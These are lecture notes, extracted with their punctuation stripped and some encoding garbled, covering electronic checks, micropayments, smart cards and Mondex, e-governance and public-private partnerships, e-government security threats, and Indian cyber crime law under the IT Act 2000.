Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
